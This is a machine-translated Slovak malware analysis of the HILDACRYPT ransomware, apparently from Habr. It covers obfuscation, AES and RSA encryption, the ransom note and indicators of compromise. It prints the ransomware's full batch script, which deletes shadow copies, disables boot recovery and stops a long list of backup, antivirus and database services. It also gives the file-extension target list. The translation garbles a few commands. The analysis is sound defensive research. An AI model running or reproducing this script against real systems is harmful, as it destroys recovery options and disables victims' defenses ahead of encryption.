Ahoj Habr! Opäť hovoríme o najnovších verziách malvéru z kategórie Ransomware. HILDACRYPT je nový ransomvér, člen rodiny Hilda objavený v auguste 2019, pomenovaný podľa karikatúry Netflix, ktorá bola použitá na distribúciu softvéru. Dnes sa oboznamujeme s technickými vlastnosťami tohto aktualizovaného ransomvérového vírusu.
V prvej verzii ransomvéru Hilda bol odkaz na jeden zverejnený na Youtube
Statická analýza
Ransomvér je obsiahnutý v súbore PE32 .NET napísanom pre MS Windows. Jeho veľkosť je 135 168 bajtov. Hlavný programový kód aj obranný programový kód sú napísané v C#. Podľa dátumu a časovej pečiatky zostavenia bola dvojhviezda vytvorená 14. septembra 2019.
Podľa Detect It Easy je ransomvér archivovaný pomocou Confuser a ConfuserEx, ale tieto obfuskátory sú rovnaké ako predtým, len ConfuserEx je nástupcom Confuser, takže ich kódové podpisy sú podobné.
HILDACRYPT je skutočne zabalený s ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Vektor útoku
Ransomvér bol s najväčšou pravdepodobnosťou objavený na jednej z webových programovacích lokalít, maskovaný ako legitímny program XAMPP.
Je možné vidieť celý reťazec infekcie
Zahmlievanie
Reťazce ransomvéru sú uložené v zašifrovanej forme. Po spustení ich HILDACRYPT dešifruje pomocou Base64 a AES-256-CBC.
Inštalácia
V prvom rade ransomvér vytvorí priečinok v %AppDataRoaming%, v ktorom sa náhodne vygeneruje parameter GUID (Globaly Unique Identifier). Pridaním súboru bat do tohto umiestnenia ho vírus ransomware spustí pomocou cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & ukončite
Potom začne spúšťať dávkový skript na deaktiváciu systémových funkcií alebo služieb.
Skript obsahuje dlhý zoznam príkazov, ktoré ničia tieňové kópie, deaktivujú SQL server, zálohovacie a antivírusové riešenia.
Napríklad sa neúspešne pokúša zastaviť služby Acronis Backup. Okrem toho útočí na zálohovacie systémy a antivírusové riešenia od týchto dodávateľov: Veeam, Sophos, Kaspersky, McAfee a ďalších.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Akonáhle sú služby a procesy uvedené vyššie deaktivované, cryptolocker zhromažďuje informácie o všetkých spustených procesoch pomocou príkazu tasklist, aby sa zaistilo, že všetky potrebné služby nefungujú.
zoznam úloh v/fo csv
Tento príkaz zobrazí podrobný zoznam spustených procesov, ktorých prvky sú oddelené znakom „,“.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Po tejto kontrole ransomvér spustí proces šifrovania.
šifrovanie
Šifrovanie súborov
HILDACRYPT prechádza všetok nájdený obsah pevných diskov okrem priečinkov Recycle.Bin a Reference AssembliesMicrosoft. Ten obsahuje kritické súbory dll, pdb atď. pre aplikácie .Net, ktoré môžu ovplyvniť fungovanie ransomvéru. Na vyhľadávanie súborov, ktoré budú šifrované, sa používa nasledujúci zoznam prípon:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Ransomvér používa na šifrovanie používateľských súborov algoritmus AES-256-CBC. Veľkosť kľúča je 256 bitov a veľkosť inicializačného vektora (IV) je 16 bajtov.
Na nasledujúcej snímke obrazovky boli hodnoty byte_2 a byte_1 získané náhodne pomocou GetBytes().
kľúč
ВИ
Šifrovaný súbor má príponu HCY!.. Toto je príklad zašifrovaného súboru. Pre tento súbor bol vytvorený kľúč a vyššie uvedené IV.
Šifrovanie kľúča
cryptolocker ukladá vygenerovaný kľúč AES do zašifrovaného súboru. Prvá časť zašifrovaného súboru má hlavičku, ktorá obsahuje údaje ako HILDACRYPT, KEY, IV, FileLen vo formáte XML a vyzerá takto:
Šifrovanie kľúčov AES a IV sa vykonáva pomocou RSA-2048 a kódovanie sa vykonáva pomocou Base64. Verejný kľúč RSA je uložený v tele cryptolockera v jednom zo zašifrovaných reťazcov vo formáte XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Verejný kľúč RSA sa používa na šifrovanie kľúča súboru AES. Verejný kľúč RSA je kódovaný Base64 a pozostáva z modulu a verejného exponentu 65537. Dešifrovanie vyžaduje súkromný kľúč RSA, ktorý má útočník.
Po zašifrovaní RSA je kľúč AES zakódovaný pomocou Base64 uloženého v zašifrovanom súbore.
Výkupná správa
Po dokončení šifrovania zapíše HILDACRYPT súbor html do priečinka, v ktorom boli súbory zašifrované. Upozornenie na ransomvér obsahuje dve e-mailové adresy, na ktorých môže obeť kontaktovať útočníka.
Oznámenie o vydieraní obsahuje aj riadok „No loli is safe;)“ – odkaz na anime a manga postavy s výzorom malých dievčat, ktoré sú v Japonsku zakázané.
Výkon
HILDACRYPT, nová rodina ransomvéru, vydala novú verziu. Šifrovací model bráni obeti dešifrovať súbory zašifrované ransomvérom. Cryptolocker používa aktívne metódy ochrany na deaktiváciu služieb ochrany súvisiacich so zálohovacími systémami a antivírusovými riešeniami. Autor HILDACRYPTU je fanúšikom animovanej série Hilda zobrazenej na Netflixe, ktorej odkaz na upútavku bol obsiahnutý v liste o kúpe predchádzajúcej verzie programu.
Ako zvyčajne,
Ukazovatele kompromisu
Prípona súboru HCY!
HILDACRYPTReadMe.html
xamp.exe s jedným písmenom "p" a bez digitálneho podpisu
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Zdroj: hab.com